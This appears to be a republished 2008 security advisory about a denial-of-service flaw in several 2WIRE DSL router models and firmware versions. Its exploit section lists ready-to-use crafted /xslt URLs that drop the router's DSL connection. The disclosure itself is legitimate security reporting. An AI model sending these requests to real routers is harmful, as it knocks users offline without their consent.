‘2WIRE DSL Router (xslt) Denial of Service Vulnerability’

Published on November 9th, 2008
Summary

The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character.’

Credit:

‘The information has been provided by hkm.
The original article can be found at: http://www.milw0rm.com/exploits/7060


Details

Vulnerable Systems:
 * 2WIRE DSL Router 1701HG
 * 2WIRE DSL Router 1800HW
 * 2WIRE DSL Router 2071HG
 * 2WIRE DSL Router 2700HG Gateway
 * 2WIRE DSL Router firmware version 3.17.5
 * 2WIRE DSL Router firmware version 3.7.1
 * 2WIRE DSL Router firmware version 4.25.19
 * 2WIRE DSL Router firmware version 5.29.51

Exploit:
http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%’
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?’

Categories: News
Tags:

Related Posts

Featured News

HUAWEI P30 with versions earlier than 10.1.0.160 Exposure of Sensitive Information to an Unauthorized Actor Vulnerability

Featured News

HUAWEI P30 with versions earlier than 10.1.0.135 Improper Verification of Cryptographic Signature Vulnerability

Featured News

HUAWEI P30 smartphone versions 10.1.0.135 Exposure of Sensitive Information to an Unauthorized Actor Vulnerability